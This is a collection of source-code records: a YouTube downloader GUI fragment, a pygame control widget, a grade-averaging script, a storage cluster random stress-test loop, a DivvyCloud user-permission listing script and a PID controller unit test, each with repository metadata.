
    Accepts both '9e9e9e' and '#9e9e9e': the leading '#' is stripped, which
    the original (commented-out) code intended but never did.
    """
    hex = hex.lstrip('#')
    return tuple(int(hex[i:i+2], 16) for i in (0, 2, 4))
# Quick manual sanity check of the hex -> RGB conversion.
print(hexToRGB('9e9e9e'))
# Default download directory: the user's Downloads known folder (Windows).
folder_id = getattr(FOLDERID, 'Downloads')
# print(kp.get_path(folderid=folder_id))
vp = dpg.create_viewport(title='Youtube-DL', width=770, height=750)
yt = YTDL()
# Directory picker used to choose the output folder; hidden until the button is pressed.
file_dialog = dpg.add_file_dialog(directory_selector=True, default_path=(kp.get_path(folderid=folder_id)),
                                  show=False, callback=yt.output_folder, width=300, height=400, label='Select an output directory')
# Font shipped next to the sources: <repo root>/fonts/Lato/Lato-Regular.ttf
font_dir = os.path.join(os.path.dirname(os.path.dirname(
    os.path.realpath(__file__))), 'fonts/Lato/Lato-Regular.ttf')
# Color palette: https://coolors.co/3d5a80-98c1d9-e0fbfc-ee6c4d-293241
with dpg.theme(default_theme=True) as theme_id:
    dpg.add_theme_color(dpg.mvThemeCol_WindowBg, hexToRGB(
        '3d5a80'), category=dpg.mvThemeCat_Core)
    dpg.add_theme_color(dpg.mvThemeCol_FrameBg, hexToRGB(
        '293241'), category=dpg.mvThemeCat_Core)
    dpg.add_theme_color(dpg.mvThemeCol_Button, hexToRGB('ee6c4d'),
                        category=dpg.mvThemeCat_Core)
    dpg.add_theme_style(dpg.mvStyleVar_FrameRounding,
                        2, category=dpg.mvThemeCat_Core)
with dpg.font_registry():
    dpg.add_font(font_dir, 18, default_font=True)
# Main window: URL input, output-folder picker, quality combos, log pane, download button.
with dpg.window(label="Example Window", width=750, no_title_bar=True, height=205, id=primary_window, no_move=True, no_resize=True):
    dpg.set_primary_window(primary_window, False)
    with dpg.group(label="InputGroup", width=300):
        dpg.add_text(default_value='Download Youtube Videos')
        dpg.add_input_text(label='Enter URL Here',
                           id=yt.url_input_text_id, callback=yt.get_video_info)
        dpg.add_button(label='Select output folder',
                       callback=lambda: dpg.show_item(file_dialog))
        dpg.add_same_line()
        yt.file_path_text_widget = dpg.add_text(
            default_value=f'{yt.file_path}')
    dpg.add_spacing()
    dpg.add_separator()
    dpg.add_spacing()
    with dpg.group(label='QualityGroup', width=300):
        yt.video_quality_list = dpg.add_combo(
            label='Video Qualities', items=yt.available_video_streams, show=True, id=yt.video_quality_listbox_id)
        yt.audio_quality_list = dpg.add_combo(
            label='Audio Qualities', items=yt.available_audio_streams, show=True, id=yt.audio_quality_listbox_id)
    dpg.add_spacing()
    dpg.add_separator()
    dpg.add_spacing()
    # Log pane anchored below the controls, as wide as the main window.
    yt.logger = myMvLogger(0, dpg.get_item_height(item=primary_window),
                           'Log information', width=dpg.get_item_width(item=primary_window), height=500, no_move=True, no_resize=True)
    dpg.add_button(label="Download", callback=yt.download_files,
                   user_data=yt.logger)
dpg.set_viewport_resizable(value=False)
# dpg.set_item_theme(primary_window, theme_id)
# dpg.set_item_theme(file_dialog, theme_id)
# NOTE(review): `screen` ends up as the last detected monitor but is never used.
screen = None
for m in get_monitors():
    screen = m
dpg.setup_dearpygui(viewport=vp)
dpg.show_viewport(vp)
dpg.start_dearpygui()
# https://www.youtube.com/watch?v=5mm_gdnOxpU
| [
"rnubla@gmail.com"
] | rnubla@gmail.com |
cb70d5fe1db0f0732fbacf5597c7d99fed39b7c6 | 3d8afceef40458704efbfd10565ce3e2f6cd0662 | /objects.py | 27ead85035a6fa530b51cc97dc603bcfa4b1eb11 | [] | no_license | PyKonstantine/Cyber-Eng | 02d9c5e001f0d0e935627c8a7dca643198cd2d82 | 4c78854998641e7d77382d6e35e86942ba7d983b | refs/heads/master | 2023-03-10T08:17:26.621204 | 2021-01-31T19:53:28 | 2021-01-31T19:53:28 | 334,460,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,400 | py | import pygame as pg
from settings import HEIGHT
# Border colors for the widget: light blue when idle, darker blue when selected.
COLOR_INACTIVE = pg.Color('lightskyblue3')
COLOR_ACTIVE = pg.Color('dodgerblue2')
class LiteControlButton:
    """
    Pygame slider-like control: clicking inside its rect moves a circle
    vertically and derives an R/G color pair from the click height.
    """
    def __init__(self, x, y, w, h):
        # Hit area of the control in screen coordinates.
        self.rect = pg.Rect(x, y, w, h)
        # Current color components of the indicator circle.
        self.R = 0
        self.G = 255
        self.B = 0
        # Vertical position of the indicator inside the control surface.
        self.button_y = 20
        self.x = x
        self.y = y
        self.color = COLOR_INACTIVE
        self.active = False
        # Off-screen surface the indicator is drawn on before blitting.
        self.aria = pg.Surface((w, h))
    def handle_event(self, event):
        """Update state from a mouse click: move the indicator and recompute R/G."""
        if event.type == pg.MOUSEBUTTONDOWN:
            if self.rect.collidepoint(event.pos):
                self.active = not self.active
                self.color = COLOR_ACTIVE
                # Map the click's screen y to a y local to this control.
                # NOTE(review): assumes the control sits at the bottom of a
                # HEIGHT-tall window — confirm against the caller's layout.
                self.button_y = event.pos[-1] + (self.y - HEIGHT)
                self.R = self.button_y
                # NOTE(review): 225 here is likely a typo for 255 — confirm.
                self.G = 225 - self.R
                print(self.button_y)
                print(self.G, self.R)
            else:
                self.active = False
                self.color = COLOR_INACTIVE
                print('inactive')
    def draw(self, screen):
        """Render background, border and indicator circle, then blit to screen."""
        self.aria.fill((self.get_lite_value()))
        pg.draw.rect(screen, self.color, self.rect, 5)
        pg.draw.circle(self.aria, (self.R, self.G, self.B), (self.rect.w // 2, self.button_y), (self.rect.w // 2), 20)
        screen.blit(self.aria, (self.x, self.y))
    def get_lite_value(self):
        # Gray background level derived from G.
        # NOTE(review): returns G three times — possibly intended (R, G, B); confirm.
        return self.G, self.G, self.G
| [
"chai.ne.voron1991@gmail.com"
] | chai.ne.voron1991@gmail.com |
76e4e94088cac8fe23976295b68806f853d5a0ef | cc8b87bef3cb2d93928d7882c1aa2cb6d29bd819 | /Python/cali_usa.py | 81f2f8cd3bcd4b918b3200fd8d66dde07995edb4 | [] | no_license | angelicaba23/MisionTic2022 | e61cf66ebe069d1b72995ebc466d85224486ad1c | e547343dd7f7dcbaf49958a99f0722f53c4df3a3 | refs/heads/master | 2023-08-01T03:42:36.252984 | 2021-09-17T02:29:06 | 2021-09-17T02:29:06 | 379,116,250 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,227 | py | """
------------MinTic-----------------
-------------UPB-------------------
-------Angélica Barranco-----------
"""
# Interactive grade-summary tool: for each course, read numeric grades [0-100]
# per student, print each student's letter grade, then the per-letter and
# course averages. User-facing prompts are intentionally kept in Spanish.
# (Removed dead variables `num_factura` and `menu2` from the original.)
menu = "si"
while menu == "si":
    print("\nBienvenido al sistema de calificacion")
    # Per-letter accumulators: nota_* sums the numeric grades, c_* counts them.
    nota_a = 0
    nota_b = 0
    nota_c = 0
    nota_d = 0
    nota_f = 0
    c_f = 0
    c_d = 0
    c_c = 0
    c_b = 0
    c_a = 0
    curso = input("\nIngrese el curso: ")
    estudiante = int(input("\nIngrese el numero de estudiantes: "))
    for i in range(estudiante):
        # Sentinel outside [0, 100] forces at least one prompt.
        grado = 200
        while grado not in range(101):
            grado = int(input(f"\nIngrese la calificacion en grado numerico [0-100] del estudiante {i+1}: "))
        # Map the numeric grade to its letter band and accumulate.
        if grado < 60:
            letra = "F"
            nota_f = nota_f + grado
            c_f = c_f + 1
        elif 60 <= grado < 70:
            letra = "D"
            nota_d += grado
            c_d += 1
        elif 70 <= grado < 80:
            letra = "C"
            nota_c += grado
            c_c += 1
        elif 80 <= grado < 90:
            letra = "B"
            nota_b += grado
            c_b += 1
        elif grado >= 90:
            letra = "A"
            nota_a += grado
            c_a += 1
        else:
            letra = ""
        print(f"\n\tEstudiante {i+1} : {letra}")
    # Per-letter averages; 0 when no student fell in that band.
    if c_f != 0:
        promedio_f = nota_f / c_f
    else:
        promedio_f = 0
    if c_d != 0:
        promedio_d = nota_d / c_d
    else:
        promedio_d = 0
    if c_c != 0:
        promedio_c = nota_c / c_c
    else:
        promedio_c = 0
    if c_b != 0:
        promedio_b = nota_b / c_b
    else:
        promedio_b = 0
    if c_a != 0:
        promedio_a = nota_a / c_a
    else:
        promedio_a = 0
    # NOTE(review): raises ZeroDivisionError when 0 students are entered (as
    # did the original) — consider guarding if that input is expected.
    promedio = (nota_f+nota_a+nota_b+nota_c+nota_d)/estudiante
    print(f"\n\t--------- CURSO {curso} ----------")
    print(f"\n\t\t\t\t PROMEDIO")
    print(f"\n\t A \t\t\t {promedio_a}")
    print(f"\n\t B \t\t\t {promedio_b}")
    print(f"\n\t C \t\t\t {promedio_c}")
    print(f"\n\t D \t\t\t {promedio_d}")
    print(f"\n\t F \t\t\t {promedio_f}")
    print(f"\n\t CURSO \t\t\t {promedio}")
    menu = input("\n Desea agregar notas de un nuevo curso? si/no: ")
"angelicaba9923@gmail.com"
] | angelicaba9923@gmail.com |
eebdc0052426934db29e5ef417df31c842b4617d | 1d3450789ee37cceaacddf1cce7508277fd8c240 | /testcli.py | abba3396419e79a83b015cb7665c14970d4e89f5 | [] | no_license | Grissess/nom | cf26ebc3b9c2b891ed021be6206571e78235b6c6 | affbd99fc6dad411f5442de72299689677670132 | refs/heads/master | 2020-04-08T13:18:12.096791 | 2015-01-26T10:33:04 | 2015-01-26T10:33:04 | 23,888,844 | 0 | 0 | null | 2014-09-11T00:42:27 | 2014-09-10T19:27:10 | Python | UTF-8 | Python | false | false | 122 | py | import service
# Manual smoke test for the service layer: start a local service on port
# 12075, connect to a peer on localhost:12074 and resolve the name 'X'.
srv=service.Service(('', 12075))
srv.start()
cli=srv.Connect(('127.0.0.1', 12074))
# NOTE(review): the Resolve result is bound to rx but never checked here.
rx=srv.Resolve(cli, 'X')
"grissess@nexusg.org"
] | grissess@nexusg.org |
fa3f7ccbf4b282e0ed863b3a8fc5815164a62dd5 | 48bba3541896587cd96112ff4a814d5d8ec6414c | /codes/infer_video1.py | e01911f5f5ff92f0c6a5d5b8471da8590f406570 | [
"BSD-2-Clause"
] | permissive | Bala93/Digital-pathology | f056ebb42c7592fdca400ee0e832fb5225b91085 | 6be5f8a75d9ace9035e915b02244cf97af25ec96 | refs/heads/master | 2021-09-19T10:23:54.459477 | 2018-07-26T18:18:45 | 2018-07-26T18:18:45 | 102,435,574 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 78 | py | /media/htic/NewVolume1/murali/Object_detection/models/research/infer_video1.py | [
"balamuralim.1993@gmail.com"
] | balamuralim.1993@gmail.com |
eba383154f45d3e7af31022c4c2cb7368e4e1f19 | 75e03232591b263a50523d7cfef4041db36caf01 | /VMWsolutions/at2-vclient-032/cft/stress_random_loop.py | 9838ee1acd308fedd0e76ae9218942c2a0100af3 | [] | no_license | adamkittel/src | aaf157062d069998a8d18841895e7362cf868ff9 | 11e3927bd990b885eba595346694de2d2601d5c9 | refs/heads/master | 2021-01-11T16:13:14.592894 | 2017-01-25T18:29:09 | 2017-01-25T18:29:09 | 80,040,934 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,389 | py | """
This action will run random stress tests in a loop
When run as a script, the following options/env variables apply:
--mvip The managementVIP of the cluster
SFMVIP env var
--user The cluster admin username
SFUSER env var
--pass The cluster admin password
SFPASS env var
--emailTo List of addresses to send email to
--iterations how many times to loop over the stress tests, 0=forever
"""
import sys
import time
from optparse import OptionParser
import lib.libsf as libsf
from lib.libsf import mylog
import logging
import lib.sfdefaults as sfdefaults
from lib.action_base import ActionBase
import send_email
import random
import stress_netbounce_sequential
import stress_nodefail_sequential
import stress_reboot_master
import stress_reboot_random
import stress_reboot_sequential
import stress_volume_rebalance
import get_active_nodes
class StressRandomLoopAction(ActionBase):
    """
    Action that repeatedly runs a randomly chosen stress test (netbounce,
    node fail, reboots, volume rebalance) against a cluster, emailing
    failures and a final summary.
    """
    class Events:
        """
        Events that this action defines
        """
        FAILURE = "FAILURE"
    def __init__(self):
        # NOTE(review): super(self.__class__, ...) breaks if this class is ever
        # subclassed (infinite recursion); kept as-is per the framework's pattern.
        super(self.__class__, self).__init__(self.__class__.Events)
    def ValidateArgs(self, args):
        """Validate the arguments passed to Execute (raises on invalid input)."""
        libsf.ValidateArgs({"mvip" : libsf.IsValidIpv4Address,
                            "username" : None,
                            "password" : None,
                            "iterationCount" : libsf.IsInteger,
                            "emailTo" : None},
            args)
    def Execute(self, mvip=sfdefaults.mvip, username=sfdefaults.username, password=sfdefaults.password, iterationCount=100, emailTo=None, debug=False):
        """
        Run random stress tests in a loop.

        :param mvip: management VIP of the cluster
        :param username: cluster admin username
        :param password: cluster admin password
        :param iterationCount: number of loop iterations; 0 means loop forever
        :param emailTo: addresses to email failures / the final summary to
        :param debug: enable verbose console logging
        """
        self.ValidateArgs(locals())
        if debug:
            mylog.console.setLevel(logging.DEBUG)
        if iterationCount == 0:
            mylog.warning("Looping Forever")
            # Seed value; the loop extends `count` each iteration when looping forever.
            count = 10
        else:
            count = iterationCount
        stress_test = ["stress_netbounce_sequential", "stress_nodefail_sequential", "stress_reboot_master", "stress_reboot_random", "stress_reboot_sequential", "stress_volume_rebalance"]
        nodes_list = get_active_nodes.Get(mvip=mvip, username=username, password=password)
        if nodes_list == False:
            mylog.error("Could not get the list of active nodes")
            return False
        start_time = time.time()
        for i in xrange(0, count):
            # Pick a random test and a random iteration count (1-10) for it.
            random_index = random.randint(0, len(stress_test) - 1)
            random_iteration = random.randint(1,10)
            if iterationCount == 0:
                mylog.banner("Starting " + stress_test[random_index].replace("_", " ").title() + " on " + mvip + " with " + str(random_iteration) + " iterations" + "\nIteration " + str(i) + " of infinity")
            else:
                mylog.banner("Starting " + stress_test[random_index].replace("_", " ").title() + " on " + mvip + " with " + str(random_iteration) + " iterations" + "\nIteration " + str(i) + " of " + str(iterationCount))
            try:
                if stress_test[random_index] == "stress_netbounce_sequential":
                    stress_netbounce_sequential.Execute(mvip=mvip, username=username, password=password, iteration=random_iteration, emailTo=emailTo)
                    #mvip=sfdefaults.mvip, username=sfdefaults.username, password=sfdefaults.password, emailTo=None, iteration=1
                if stress_test[random_index] == "stress_nodefail_sequential":
                    # Failing a node needs enough remaining nodes to keep quorum.
                    if len(nodes_list) <=3:
                        mylog.banner("Skipping Stress Nodefail Sequential because there are not enough nodes")
                    else:
                        stress_nodefail_sequential.Execute(mvip=mvip, username=username, password=password, iteration=random_iteration, emailTo=emailTo)
                        #mvip=sfdefaults.mvip, username=sfdefaults.username, password=sfdefaults.password, emailTo=None, iteration=1
                elif stress_test[random_index] == "stress_reboot_master":
                    stress_reboot_master.Execute(mvip=mvip, username=username, password=password, iteration=random_iteration, emailTo=emailTo)
                    #mvip=sfdefaults.mvip, username=sfdefaults.username, password=sfdefaults.password, emailTo=None, iteration=1
                elif stress_test[random_index] == "stress_reboot_random":
                    stress_reboot_random.Execute(mvip=mvip, username=username, password=password, iteration=random_iteration, emailTo=emailTo)
                    #mvip=sfdefaults.mvip, username=sfdefaults.username, password=sfdefaults.password, emailTo=None, iteration=1
                elif stress_test[random_index] == "stress_reboot_sequential":
                    stress_reboot_sequential.Execute(mvip=mvip, username=username, password=password, iteration=random_iteration, emailTo=emailTo)
                    #mvip=sfdefaults.mvip, username=sfdefaults.username, password=sfdefaults.password, emailTo=None, iteration=1
                elif stress_test[random_index] == "stress_volume_rebalance":
                    stress_volume_rebalance.Execute(mvip=mvip, username=username, password=password, iteration=random_iteration, emailTo=emailTo)
            except Exception as e:
                # A failed sub-test is reported by email but does not stop the loop.
                mylog.error("Could not preform " + stress_test[random_index].replace("_", " ").title())
                send_email.Execute(emailTo=emailTo, emailSubject="Test " + stress_test[random_index].replace("_", " ").title() + " failed", emailBody=str(e))
            # Cool-down between tests.
            mylog.step("Waiting 2 minutes")
            time.sleep(120)
            #if loopfoever then increase iterationCount by 1 each time so we never end the for loop
            if iterationCount == 0:
                count += 1
            # Per-iteration timing summary.
            end_time = time.time()
            delta_time = libsf.SecondsToElapsedStr(end_time - start_time)
            ave_time_per_iteration = (end_time - start_time) / (i + 1)
            ave_time_per_iteration = libsf.SecondsToElapsedStr(ave_time_per_iteration)
            mylog.info("\tTotal Time: " + delta_time)
            mylog.info("\tNumber of Iterations: " + str(i + 1))
            mylog.info("\tAverage Time Per Iteration: " + ave_time_per_iteration)
        emailBody = "The stress tests ran for " + delta_time + "\nTotal Iterations " + str(i + 1) + "\nAverage Time Per Iteration " + ave_time_per_iteration
        send_email.Execute(emailTo=emailTo, emailSubject="The Testing Finished", emailBody=emailBody)
        mylog.passed("Passed " + str(iterationCount) + " iterations of random stress testing")
        return True
# Instantiate the class and add its attributes to the module.
# This allows it to be executed simply as module_name.Execute
libsf.PopulateActionModule(sys.modules[__name__])

if __name__ == '__main__':
    mylog.debug("Starting " + str(sys.argv))

    # Parse command line arguments
    parser = OptionParser(option_class=libsf.ListOption, description=libsf.GetFirstLine(sys.modules[__name__].__doc__))
    parser.add_option("-m", "--mvip", type="string", dest="mvip", default=sfdefaults.mvip, help="the management IP of the cluster")
    parser.add_option("-u", "--user", type="string", dest="username", default=sfdefaults.username, help="the admin account for the cluster")
    parser.add_option("-p", "--pass", type="string", dest="password", default=sfdefaults.password, help="the admin password for the cluster")
    parser.add_option("--iterations", type="int", dest="iterations", default=100, help="How many iterations to loop over. 0 = Forever")
    parser.add_option("--email_to", type="string", dest="email_to", default=None, help="The email account to send the results / updates to")
    parser.add_option("--debug", action="store_true", dest="debug", default=False, help="display more verbose messages")
    (options, extra_args) = parser.parse_args()

    try:
        timer = libsf.ScriptTimer()
        # Exit status mirrors the test result: 0 on success, 1 on failure
        if Execute(options.mvip, options.username, options.password, options.iterations, options.email_to, options.debug):
            sys.exit(0)
        else:
            sys.exit(1)
    except libsf.SfArgumentError as e:
        mylog.error("Invalid arguments - \n" + str(e))
        sys.exit(1)
    except SystemExit:
        # Let explicit sys.exit() calls propagate untouched
        raise
    except KeyboardInterrupt:
        mylog.warning("Aborted by user")
        Abort()
        exit(1)
    except:
        # Last-resort handler so an unexpected failure is logged before exiting
        mylog.exception("Unhandled exception")
        exit(1)
    exit(0)
| [
"adam.kittel@solidfire.com"
] | adam.kittel@solidfire.com |
f1a2454b34e5977852b4f29981527465145cb558 | c86c07584e618c5a4936b13768ef417a319d4b06 | /show_user_permissions.py | 58928ceed0f506d981b1709985ce96329146f53c | [] | no_license | DivvyCloud/tools | 24c1404576e1d30625ae3be16b21c033c8e0bad2 | 53b3686b89e23fcfa44cd4fb95014929ee3cca27 | refs/heads/master | 2020-07-12T07:27:44.537320 | 2019-11-01T18:10:03 | 2019-11-01T18:10:03 | 204,754,278 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,059 | py | # Script to list all permissions a user has via groups and roles
##### SAMPLE OUTPUT
'''
[Alex-MBP scripts]$python show_user_permissions.py
User: ben.calpotura
Number of attached groups: 3
Roles for group: Marketing Team
[]
Roles for group: DivvySales
[ { 'add_cloud': False,
'all_permissions': False,
'badge_scopes': [],
'cloud_scopes': [],
'delete': False,
'description': 'Testing role',
'global_scope': True,
'groups': ['divvyusergroup:39', 'divvyusergroup:45'],
'manage': True,
'name': 'Global View-Provision-Manage',
'provision': True,
'resource_group_scopes': [],
'resource_id': 'divvyrole:1:25',
'view': True},
{ 'add_cloud': False,
'all_permissions': False,
'badge_scopes': [],
'cloud_scopes': [],
'delete': False,
'description': 'DivvyCloud Sales Team role',
'global_scope': True,
'groups': ['divvyusergroup:45'],
'manage': True,
'name': 'DivvySales',
'provision': True,
'resource_group_scopes': [],
'resource_id': 'divvyrole:1:34',
'view': True}]
Roles for group: Group Curation
[ { 'add_cloud': False,
'all_permissions': False,
'badge_scopes': [],
'cloud_scopes': [],
'delete': False,
'description': 'Curate into whitelist RG',
'global_scope': False,
'groups': ['divvyusergroup:52', 'divvyusergroup:64'],
'manage': True,
'name': 'Resource Group Curation',
'provision': False,
'resource_group_scopes': ['resourcegroup:64:'],
'resource_id': 'divvyrole:1:53',
'view': True}]
'''
import json
import requests
import getpass
import pprint
pp = pprint.PrettyPrinter(indent=4)
# Username/password to authenticate against the API
username = ""
password = "" # Leave this blank if you don't want it in plaintext and it'll prompt you to input it when running the script.

# User in DivvyCloud whose effective permissions will be reported
divvy_user = ""

# API URL
base_url = "https://sales-demo.divvycloud.com"

# Param validation: interactively prompt for anything not hard-coded above
if not username:
    username = input("Username: ")
if not password:
    # getpass hides the password while it is typed
    passwd = getpass.getpass('Password:')
else:
    passwd = password
if not base_url:
    base_url = input("Base URL (EX: http://localhost:8001 or http://45.59.252.4:8001): ")
if not divvy_user:
    divvy_user = input("Username in DivvyCloud: ")

# Full URL of the login endpoint
login_url = base_url + '/v2/public/user/login'
# Shorthand helper function
def get_auth_token():
    """Log in to the DivvyCloud API and return the session token."""
    credentials = {"username": username, "password": passwd}
    login_headers = {
        'Content-Type': 'application/json;charset=UTF-8',
        'Accept': 'application/json'
    }
    resp = requests.post(url=login_url,
                         data=json.dumps(credentials),
                         headers=login_headers)
    return resp.json()['session_id']
auth_token = get_auth_token()

# Every subsequent API call authenticates with this session token
headers = {
    'Content-Type': 'application/json;charset=UTF-8',
    'Accept': 'application/json',
    'X-Auth-Token': auth_token
}
# Fetch the full user list from the API
def get_users():
    """Return every DivvyCloud user visible to the authenticated session."""
    resp = requests.get(
        url=base_url + '/v2/public/users/list',
        data=json.dumps({}),
        headers=headers
    )
    return resp.json()
# Fetch group (and role) membership for a single user id
def get_group_info(user_id):
    """Return the groups — each with its attached roles — for *user_id*."""
    endpoint = base_url + '/v2/prototype/user/divvyuser:' + user_id + ':/groups/list'
    resp = requests.post(
        url=endpoint,
        data=json.dumps({}),
        headers=headers
    )
    return resp.json()
# Walk every user, find the one matching divvy_user, and print the roles
# attached via each of that user's groups
user_list = get_users()
#print(user_list)
for user_info in user_list['users']:
    username = user_info['username']
    if username == divvy_user:
        # List group info for the user
        group_info = get_group_info(str(user_info['user_id']))
        print("User: " + username)
        print("Number of attached groups: " + str(len(group_info['groups'])))
        for group in group_info['groups']:
            print("Roles for group: " + group['name'])
            #print(group['roles'])
            pp.pprint(group['roles'])
| [
"alex.corstorphine@divvycloud.com"
] | alex.corstorphine@divvycloud.com |
91956ba4d19b41720a01993ac3acbd491ad295d4 | cd5746f8cc7aee1f20606a65b4fae0d5e8ee78dc | /Python Books/PythonTesting-BeginnersGuide/code/tests/test_chapter5/test_pid.py | 72b93cd1bcd67c97b5266912ef867908e2d9e800 | [] | no_license | theGreenJedi/Path | df24fca355590efef0c6cb5c52e7216c6b5d2464 | b5ed2805dbb046480929e49e550bfd8af5bb4d6f | refs/heads/master | 2023-07-27T14:23:37.694546 | 2021-07-16T01:38:55 | 2021-07-16T01:38:55 | 87,686,563 | 8 | 2 | null | 2023-07-11T22:49:03 | 2017-04-09T05:57:30 | Jupyter Notebook | UTF-8 | Python | false | false | 2,718 | py | from unittest import TestCase, main
from mocker import Mocker
import pid
class test_pid_constructor(TestCase):
    """Unit tests for pid.PID.__init__."""

    def test_without_when(self):
        # When no 'when' timestamp is given, the constructor falls back to
        # time.time(); mock it so the test is deterministic.
        mocker = Mocker()
        mock_time = mocker.replace('time.time')
        mock_time()
        mocker.result(1.0)
        mocker.replay()

        controller = pid.PID(P = 0.5, I = 0.5, D = 0.5,
                             setpoint = 0, initial = 12)

        mocker.restore()
        mocker.verify()

        self.assertEqual(controller.gains, (0.5, 0.5, 0.5))
        self.assertAlmostEqual(controller.setpoint[0], 0.0)
        self.assertEqual(len(controller.setpoint), 1)
        self.assertAlmostEqual(controller.previous_time, 1.0)
        # previous_error = setpoint - initial = 0 - 12
        self.assertAlmostEqual(controller.previous_error, -12.0)
        self.assertAlmostEqual(controller.integrated_error, 0)

    def test_with_when(self):
        # An explicit 'when' timestamp means time.time() is never consulted.
        controller = pid.PID(P = 0.5, I = 0.5, D = 0.5,
                             setpoint = 1, initial = 12,
                             when = 43)
        self.assertEqual(controller.gains, (0.5, 0.5, 0.5))
        self.assertAlmostEqual(controller.setpoint[0], 1.0)
        self.assertEqual(len(controller.setpoint), 1)
        self.assertAlmostEqual(controller.previous_time, 43.0)
        self.assertAlmostEqual(controller.previous_error, -11.0)
        self.assertAlmostEqual(controller.integrated_error, 0)
class test_calculate_response(TestCase):
    """Unit tests for pid.PID.calculate_response."""

    def test_without_when(self):
        # Mock time.time() to return 1.0..5.0 on successive calls: the first
        # is consumed by the constructor, the remaining four by the four
        # calculate_response() calls below.
        mocker = Mocker()
        mock_time = mocker.replace('time.time')
        mock_time()
        mocker.result(1.0)
        mock_time()
        mocker.result(2.0)
        mock_time()
        mocker.result(3.0)
        mock_time()
        mocker.result(4.0)
        mock_time()
        mocker.result(5.0)
        mocker.replay()

        controller = pid.PID(P = 0.5, I = 0.5, D = 0.5,
                             setpoint = 0, initial = 12)

        self.assertEqual(controller.calculate_response(6), -3)
        self.assertEqual(controller.calculate_response(3), -4.5)
        self.assertEqual(controller.calculate_response(-1.5), -0.75)
        self.assertEqual(controller.calculate_response(-2.25), -1.125)

        mocker.restore()
        mocker.verify()

    def test_with_when(self):
        # Same sequence of measurements, but with explicit timestamps instead
        # of mocked time.time(); results must match the mocked test above.
        controller = pid.PID(P = 0.5, I = 0.5, D = 0.5,
                             setpoint = 0, initial = 12,
                             when = 1)
        self.assertEqual(controller.calculate_response(6, 2), -3)
        self.assertEqual(controller.calculate_response(3, 3), -4.5)
        self.assertEqual(controller.calculate_response(-1.5, 4), -0.75)
        self.assertEqual(controller.calculate_response(-2.25, 5), -1.125)
if __name__ == '__main__':
    # Run every TestCase in this module via unittest's CLI runner
    main()
| [
"GreenJedi@protonmail.com"
] | GreenJedi@protonmail.com |
76d1807da6e30de90b7fc8d7ae5c3f2be4b808a3 | c10f20abec372f81dbd6468ead208543f60940f1 | /learning/20.BayesianNetwork/20.1.Iris_GaussianNB.py | 8cd96f72d7add1efc07bd0c634a76cf4b1150c0f | [] | no_license | alenzhd/meachineLearning | 64876e7a6c0b8b39a63a9eb586d306a3489b4447 | 1b66ce2f73b226548f07e45c8537b8286635a048 | refs/heads/master | 2021-08-24T10:55:52.056439 | 2017-12-09T10:26:37 | 2017-12-09T10:26:37 | 112,688,163 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,854 | py | #!/usr/bin/python
# -*- coding:utf-8 -*-
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib as mpl
from sklearn.preprocessing import StandardScaler, MinMaxScaler, PolynomialFeatures
from sklearn.naive_bayes import GaussianNB, MultinomialNB
from sklearn.pipeline import Pipeline
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
from sklearn.neighbors import KNeighborsClassifier
def iris_type(s):
    """Map an iris species name to its integer class label (0, 1 or 2)."""
    labels = {'Iris-setosa': 0, 'Iris-versicolor': 1, 'Iris-virginica': 2}
    return labels[s]
if __name__ == "__main__":
    # Load the iris data set; column 4 holds the species name
    data = pd.read_csv('..\\8.Regression\\iris.data', header=None)
    x, y = data[np.arange(4)], data[4]
    y = pd.Categorical(values=y).codes
    feature_names = u'花萼长度', u'花萼宽度', u'花瓣长度', u'花瓣宽度'
    # Keep only the first two features (sepal length/width) so the decision
    # regions can be drawn in 2D
    features = [0,1]
    x = x[features]
    x, x_test, y, y_test = train_test_split(x, y, train_size=0.7, random_state=0)

    # Class priors, normalized to sum to 1
    priors = np.array((1,2,4), dtype=float)
    priors /= priors.sum()

    gnb = Pipeline([
        ('sc', StandardScaler()),
        ('poly', PolynomialFeatures(degree=1)),
        ('clf', GaussianNB(priors=priors))])  # The iris data is class-balanced, so setting priors is not actually needed
    # gnb = KNeighborsClassifier(n_neighbors=3).fit(x, y.ravel())
    gnb.fit(x, y.ravel())
    y_hat = gnb.predict(x)
    print ('训练集准确度: %.2f%%' % (100 * accuracy_score(y, y_hat)))
    y_test_hat = gnb.predict(x_test)
    print ('测试集准确度:%.2f%%' % (100 * accuracy_score(y_test, y_test_hat)))

    # Plot the decision regions
    N, M = 500, 500  # number of grid samples along each axis
    x1_min, x2_min = x.min()
    x1_max, x2_max = x.max()
    t1 = np.linspace(x1_min, x1_max, N)
    t2 = np.linspace(x2_min, x2_max, M)
    x1, x2 = np.meshgrid(t1, t2)  # grid of sample points
    x_grid = np.stack((x1.flat, x2.flat), axis=1)  # test points

    # Matplotlib setup for CJK labels and minus signs
    mpl.rcParams['font.sans-serif'] = [u'simHei']
    mpl.rcParams['axes.unicode_minus'] = False
    cm_light = mpl.colors.ListedColormap(['#77E0A0', '#FF8080', '#A0A0FF'])
    cm_dark = mpl.colors.ListedColormap(['g', 'r', 'b'])

    y_grid_hat = gnb.predict(x_grid)  # predicted class for every grid point
    y_grid_hat = y_grid_hat.reshape(x1.shape)
    plt.figure(facecolor='w')
    plt.pcolormesh(x1, x2, y_grid_hat, cmap=cm_light)  # show predicted regions
    plt.scatter(x[features[0]], x[features[1]], c=y, edgecolors='k', s=50, cmap=cm_dark)
    plt.scatter(x_test[features[0]], x_test[features[1]], c=y_test, marker='^', edgecolors='k', s=120, cmap=cm_dark)
    plt.xlabel(feature_names[features[0]], fontsize=13)
    plt.ylabel(feature_names[features[1]], fontsize=13)
    plt.xlim(x1_min, x1_max)
    plt.ylim(x2_min, x2_max)
    plt.title(u'GaussianNB对鸢尾花数据的分类结果', fontsize=18)
    plt.grid(True)
    plt.show()
| [
"zhanghd@asiainfo-mixdata.com"
] | zhanghd@asiainfo-mixdata.com |
20c0f10f618f37ebff15f67061d06d10a35ab6ef | 59dd90d261756b0de462b693d596f5f06f71270b | /samples/openapi3/client/petstore/python-experimental/petstore_api/api/fake_api_endpoints/group_parameters.py | bab146a1f469249eb19f39009467267a361a1734 | [
"Apache-2.0"
